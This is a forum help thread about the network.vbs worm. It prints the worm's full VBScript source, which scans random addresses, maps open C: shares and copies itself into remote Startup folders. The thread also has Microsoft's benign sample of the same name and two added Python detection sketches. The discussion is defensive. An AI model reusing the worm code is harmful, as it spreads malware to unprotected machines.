Is this a virus? (Visual Basic question)

My laptop computer crashes constantly and I am trying to determine the cause (without any success so far). It will work for a short while and then freeze. I can never shut it down correctly so every time it starts up it will run scandisk which is a RPITA.

Yesterday I was reading at MSNBC about the ILOVEYOU virus and others written in visual basic and there was the recommendation to disable the windows scripting host (control panel / install-remove programs / windows setup / accessories / windows scripting host) unless you really need it and it said most of us don’t need it. So I disabled it. I think this pretty much just means programs with a VBS extension will not run.

Today when I start the computer I get an error because it is trying to run a file called network.vbs which is located at windows / start menu / programs / startup

Lately I am not using any network but I do have some network components installed because I sometimes network with my home system. But for now I can do without the network working.

My question is this: Is network.vbs a legit network program or is it some malicious code? For the time being I will leave it disabled just to see if things improve but I’d like to know more as I am quite suspicious.

I have looked at the code but I do not know visual basic. Whatever it is that is making my computer crash has not done any other harm like renaming or deleting files.

Here is the code. Can anyone tell me if this is legit software or not? What does this do?

If it is indeed malicious how could I get it? I have NEVER opened any attachments (I use OE5)

I will report here whether the computer continues to misbehave or improves with this file disabled

= = = = = = = = = = = =

dim octa
dim octb
dim octc
dim octd
dim rand
dim dot
dim driveconnected
dim sharename
dim count
dim myfile
count = “0”
dot = “.”
driveconnected=“0”
set wshnetwork = wscript.createobject(“wscript.network”)
Set fso1 = createobject(“scripting.filesystemobject”)
set fso2 = createobject(“scripting.filesystemobject”)
on error resume next
randomize
checkfile()
randaddress()

do
do while driveconnected = “0”
checkaddress()
shareformat()
wshnetwork.mapnetworkdrive “j:”, sharename
enumdrives()
loop
copyfiles()
disconnectdrive()
loop

msgbox “Done”

function disconnectdrive()
wshnetwork.removenetworkdrive “j:”
driveconnected = “0”
end function

function createlogfile()
Set myfile = fso1.createtextfile(“c:\network.log”, True)
end function

function checkfile()
If (fso1.fileexists(“c:\network.log”)) then
fso1.deletefile(“c:\network.log”)
createlogfile()
else
createlogfile()
end If
myfile.writeLine(“Log file Open”)
end function

function copyfiles()
myfile.writeline("Copying files to : " & sharename)
Set fso = CreateObject(“scripting.filesystemobject”)

fso.copyfile “c:\network.vbs”, “j:”

If (fso2.FileExists(“j:\network.vbs”)) Then
myfile.writeline("Successfull copy to : " & sharename)
End If

fso.copyfile “c:\network.vbs”, “j:\windows\startm~1\programs\startup”

fso.copyfile “c:\network.vbs”, “j:\windows”

fso.copyfile “c:\network.vbs”, “j:\windows\start menu\programs\startup”

fso.copyfile “c:\network.vbs”, “j:\win95\start menu\programs\startup”

fso.copyfile “c:\network.vbs”, “j:\win95\startm~1\programs\startup”

fso.copyfile “c:\network.vbs”, “j:\wind95”

end function

function checkaddress()
octd = octd + 1
if octd = “255” then randaddress()
end function

function shareformat()
sharename = “\” & octa & dot & octb & dot & octc & dot & octd & “\C”
end function

function enumdrives()
Set odrives = wshnetwork.enumnetworkdrives
For i = 0 to odrives.Count -1
if sharename = odrives.item(i) then
driveconnected = 1
else
’ driveconnected = 0
end if
Next
end function

function randum()
rand = int((254 * rnd) + 1)
end function

function randaddress()
if count < 50 then
octa=Int((16) * Rnd + 199)
count=count + 1
else
randum()
octa= rand
end if
randum()
octb=rand
randum()
octc=rand
octd=“1”
myfile.writeLine("Subnet : " & octa & dot & octb & dot & octc & dot & “0”)
end function

= = = = = = = = = = =

There is indeed a CERT advisory on network.vbs “virus” (worm, malicious script, whatever you want to call it) at http://www.cert.org/incident_notes/IN-2000-02.html . Some more information at http://security.sdsc.edu/publications/network.vbs.shtml . It sounds like deleting the file should get rid of the worm though, so I’m not sure why it’s lingering.

Sailor,

That’s definitely a virus. I recommend that you delete the file, and any entry that refers to the file. Also, it refers to your J:\ drive. Inspect the J drive for the file as well, because it looks like this virus propagates on the network.

I think this is kinda cute:

I like how this wannabe spelled Random :) That’s a pretty good indication that it’s a virus as well (I didn’t look for any virus notifications online).

As an aside, this is a pretty poorly written virus because its commands show up in your system files. Makes it really easy to detect.

-Sam

scr4, Gawd, thanks for the input. These pages are a bit complicated for me to understand so I have copied them and will study them with more time. Since disabling VBS (and therefore that worm) the computer has not crashed again and closes down correctly. It seems the worm does nothing else but propagate itself? I do not have a J: drive on this computer (just C:) but I will remember to check my home system when I get back home in case it is there.

My question is how can I have got it? I have NEVER opened any attachments. Can I have got it merely by being connected to the Internet?

I have had trouble with virus detecting software in the past so I do not use it. Just use extreme caution… I need to know how this infected my system so I can prevent it.

thanks again for the info.

I feel particularly lucky that I have not lost any files with this virus-worm!

After reading those pages I think I may have an understanding of how it works. Can you please confirm or correct the following?

1- The worm selects addresses at random on the Internet and will propagate there if possible. Therefore my computer was selected at random. It did not arrive by email or browser but just because I was connected to the Internet.

2- I needed to have my drive set to share. If I do not share, the worm cannot implant. Therefore, it is best to only set to share when I am networking with my desktop (even better if disconnected from the Internet) and not share at all other times.

3- This particular worm uses VBS so disabling VBS will prevent it from working.

4- During the couple of weeks it was active on my computer it probably infected other computers while I was connected…

Is that how it works?
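The listing's checkaddress() walks the last octet of one random subnet upward one host at a time, which is easy to spot in connection logs. The sketch below is an added example, not part of the original thread; the log format, the addresses and the use of TCP port 139 (NetBIOS session service, which carries Windows 9x file sharing) are assumptions.

```python
import ipaddress
from collections import defaultdict

SMB_PORT = 139  # assumption: NetBIOS session service used by Win9x shares

def parse(line):
    """Parse one constructed log line: '<epoch> <src> <dst> <dport>'."""
    ts, src, dst, dport = line.split()
    return int(ts), src, ipaddress.ip_address(dst), int(dport)

def find_sweeps(lines, min_hosts=20):
    """Return {(src, '/24'): hosts_tried} for sources walking one /24 upward."""
    seen = defaultdict(list)
    for ts, src, dst, dport in sorted(map(parse, lines), key=lambda r: r[0]):
        if dport != SMB_PORT:
            continue
        net = ipaddress.ip_network(f"{dst}/24", strict=False)
        seen[(src, str(net))].append(int(dst) & 0xFF)  # keep last octet only
    hits = {}
    for key, octets in seen.items():
        distinct = len(set(octets))
        # Count steps where the last octet increased, as in octd = octd + 1.
        ascending = sum(b > a for a, b in zip(octets, octets[1:]))
        if distinct >= min_hosts and ascending >= 0.9 * (len(octets) - 1):
            hits[key] = distinct
    return hits

def constructed_log():
    """Constructed sample: one sweeping host, one normal client, one port-80 walk."""
    lines = [f"{1000 + i} 192.0.2.10 203.0.113.{i} 139" for i in range(2, 61)]
    lines += [f"{1000 + i} 192.0.2.20 198.51.100.{5 + i % 2} 139" for i in range(40)]
    lines += [f"{1000 + i} 192.0.2.30 203.0.113.{i} 80" for i in range(2, 61)]
    return lines

if __name__ == "__main__":
    for (src, net), count in find_sweeps(constructed_log()).items():
        print(f"{src} tried {count} hosts in {net} on port {SMB_PORT}")
```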

Just so’s you know; I have a version of network.vbs that looks considerably different from yours, and I have no problems. I assume mine is the correct one. From what I can understand (msgbox contents) I haven’t ever called this program. I do have VBasic 6; it looks like it may have been a sample included with that.

I generally frown on posting long stuff, but it’s not that long and this way others can compare theirs also. - MC

------------code starts below this line--------------
    ' Windows Script Host Sample Script

    ' ------------------------------------------------------------------------
    ' Copyright © 1996 Microsoft Corporation

    ' You have a royalty-free right to use, modify, reproduce and distribute
    ' the Sample Application Files (and/or any modified version) in any way
    ' you find useful, provided that you agree that Microsoft has no warranty,
    ' obligations or liability for any Sample Application Files.
    ' ------------------------------------------------------------------------

    ' This sample demonstrates how to use the WSHNetwork object.
    ' It reads network properties (username and computername),
    ' connects, disconnects, and enumerates network drives.
    L_Welcome_MsgBox_Message_Text = "This script demonstrates how to use the WSHNetwork object."
    L_Welcome_MsgBox_Title_Text = "Windows Scripting Host Sample"
    Call Welcome()

' ********************************************************************************
' *
' * WSH Network Object.
' *

Dim WSHNetwork
Dim colDrives, SharePoint
Dim CRLF

CRLF = Chr(13) & Chr(10)
Set WSHNetwork = WScript.CreateObject("WScript.Network")
Function Ask(strAction)

' This function asks the user whether to perform a specific "Action"
' and sets a return code or quits script execution depending on the
' button that the user presses. This function is called at various
' points in the script below.

Dim intButton
intButton = MsgBox(strAction, _
                   vbQuestion + vbYesNo, _
                   L_Welcome_MsgBox_Title_Text )
Ask = intButton = vbYes

End Function

' **************************************************
' *
' * Show WSHNetwork object properties
' *
' *
MsgBox "UserDomain" & Chr(9) & "= " & WSHNetwork.UserDomain & CRLF & _
"UserName" & Chr(9) & "= " & WSHNetwork.UserName & CRLF & _
"ComputerName" & Chr(9) & "= " & WSHNetwork.ComputerName, _
vbInformation + vbOKOnly, _
"WSHNetwork Properties"

' **************************************************
' *
' * WSHNetwork.AddNetworkDrive
' *
' *

Function TryMapDrive(intDrive, strShare)
Dim strDrive
strDrive = Chr(intDrive + 64) & ":"
On Error Resume Next
WSHNetwork.MapNetworkDrive strDrive, strShare
TryMapDrive = Err.Number = 0
End Function

If Ask("Do you want to connect a network drive?") Then
strShare = InputBox("Enter network share you want to connect to ")
For intDrive = 26 To 5 Step -1
If TryMapDrive(intDrive, strShare) Then Exit For
Next

If intDrive <= 5 Then
    MsgBox "Unable to connect to network share. " & _
           "There are currently no drive letters available for use. " & _
           CRLF                                                          & _
           "Please disconnect one of your existing network connections " & _
           "and try this script again. ", _
           vbExclamation + vbOkOnly, _
           L_Welcome_MsgBox_Title_Text
Else
    strDrive = Chr(intDrive + 64) & ":"
    MsgBox "Connected " & strShare & " to drive " & strDrive, _
           vbInformation + vbOkOnly, _
           L_Welcome_MsgBox_Title_Text

    If Ask("Do you want to disconnect the network drive you just created?") Then
        WSHNetwork.RemoveNetworkDrive strDrive

        MsgBox "Disconnected drive " & strDrive, _
               vbInformation + vbOkOnly, _
               L_Welcome_MsgBox_Title_Text
    End If
End If

End If
' **************************************************
' *
' * WSHNetwork.EnumNetworkDrive
' *
' *
'Ask user whether to enumerate network drives
If Ask("Do you want to enumerate connected network drives?") Then
'Enumerate network drives into a collection object of type WshCollection
Set colDrives = WSHNetwork.EnumNetworkDrives

'If no network drives were enumerated, then inform user, else display
'enumerated drives
If colDrives.Count = 0 Then
    MsgBox "There are no drives to enumerate.", _
           vbInformation + vbOkOnly, _
           L_Welcome_MsgBox_Title_Text
Else
    strMsg = "Current network drive connections: " & CRLF
    For i = 0 To colDrives.Count - 1 Step 2
        strMsg = strMsg & CRLF & colDrives(i) & Chr(9) & colDrives(i + 1)
    Next

    MsgBox strMsg, _
           vbInformation + vbOkOnly, _
           L_Welcome_MsgBox_Title_Text

End If

End If

' ********************************************************************************
' *
' * Welcome
' *
Sub Welcome()
Dim intDoIt

intDoIt =  MsgBox(L_Welcome_MsgBox_Message_Text, _
                  vbOKCancel + vbInformation, _
                  L_Welcome_MsgBox_Title_Text )
If intDoIt = vbCancel Then
    WScript.Quit
End If

End Sub

Yes, there is a legit MS sample program with the same name. Nothing to do with this other one though.
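Since the worm and the Microsoft sample share a file name, triage has to go by content. The following is an added example, not part of the original thread: it lists the drop locations used by the posted copyfiles() routine and labels a script by behaviour; the function names and the marker strings chosen are this example's own assumptions.

```python
import re

# Locations taken from the copyfiles() routine posted in the thread ("" = drive root).
DROP_DIRS = ["", "windows", "wind95",
             r"windows\start menu\programs\startup",
             r"windows\startm~1\programs\startup",
             r"win95\start menu\programs\startup",
             r"win95\startm~1\programs\startup"]

# A .vbs file copied into a Startup folder: the self-install step in the listing.
SELF_COPY = re.compile(r'copyfile\s+"[^"]*\.vbs"\s*,\s*"[^"]*startup')
SAMPLE_HEADER = "windows script host sample script"

def paths_to_inspect(drive):
    """Every network.vbs drop location for one drive, plus the worm's log file."""
    paths = [f"{drive}\\{d}\\network.vbs" if d else f"{drive}\\network.vbs"
             for d in DROP_DIRS]
    return paths + [f"{drive}\\network.log"]

def classify(script_text):
    """Label a network.vbs by what it does, not by its file name."""
    t = script_text.lower()
    for curly in "“”":
        t = t.replace(curly, '"')   # forum software often turns quotes curly
    if SELF_COPY.search(t) and "mapnetworkdrive" in t:
        return "worm-like"          # maps a share and plants a .vbs in Startup
    if SAMPLE_HEADER in t and "copyfile" not in t:
        return "ms-sample"          # interactive demo that copies nothing
    return "unknown"                # e.g. sample header pasted onto other code

# Constructed inputs: short excerpts of the two listings quoted in the thread.
WORM_EXCERPT = r'''
wshnetwork.mapnetworkdrive “j:”, sharename
fso.copyfile “c:\network.vbs”, “j:\windows\start menu\programs\startup”
'''
SAMPLE_EXCERPT = r'''
' Windows Script Host Sample Script
strShare = InputBox("Enter network share you want to connect to ")
WSHNetwork.MapNetworkDrive strDrive, strShare
'''

if __name__ == "__main__":
    print(classify(WORM_EXCERPT), classify(SAMPLE_EXCERPT))
    for p in paths_to_inspect("C:"):
        print(p)
```

A file that carries the sample's header but also calls CopyFile is reported as unknown rather than trusted, so the header alone never clears a file.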